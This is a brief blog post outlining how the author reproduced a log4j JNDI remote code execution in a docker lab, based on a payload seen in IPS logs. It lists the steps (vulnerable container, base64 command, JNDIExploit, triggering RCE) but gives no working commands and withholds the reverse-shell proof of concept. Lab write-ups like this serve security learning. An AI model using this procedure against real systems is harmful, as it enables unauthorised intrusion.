During this week I had a pleasure to learn more about a 'popular' log4j vulnerability. I decided to take a quick note for few cases I found in the IPS logs. Here we go...
Today we'll start here:
As this should be only a quick-note - we'll focus on "one case" only:
a poc/payload I found in one of the IPS logfiles based on GET request.
TL;DR - our scope for today is:
* step1: prepare a working/buggy environment
* step2: prepare a base64 command to run on remote/vulnerable target host
* step3: prepare JNDIExploit
* step4: run poc to gain RCE
* step5: enjoy the weekend ;)
Let's start from the beginning - step1:
To prepare my mini-lab-environment I used one of the docker images already available online - this one should be a good example:
I simply followed the steps presented in the README. After a while - we should be somewhere here:
Next step? Prepare a base64 command to run on remote/vulnerable target host. In the example mentioned above we can continue with 'touch pwned.txt' in /tmp directory...
...but as long as (mentioned there) "feihong-cs" resource (read as: JNDIExploit-1.2-SNAPSHOT.jar file) was not available there anymore I decided find it somewhere else online ;]
So after a while we should be here:
Preparing step3:
So... (first IP address: 62,210,... is the real attacker IP - be careful).
... when (your) step2 is ready:
We can move forward directly to step4: running the poc to achieve RCE:
Time to verify our request on remote docker host:
Looks like done. Remember to use it only for legal pentest/redteam purposes! ;)
Enjoy your weekend ;)
P.S.
Yes, for obvious reasons revshell poc won't be published here... ;*
...and that's the reason of the difference for the payload outputs on the screens ;)
Brak komentarzy:
Prześlij komentarz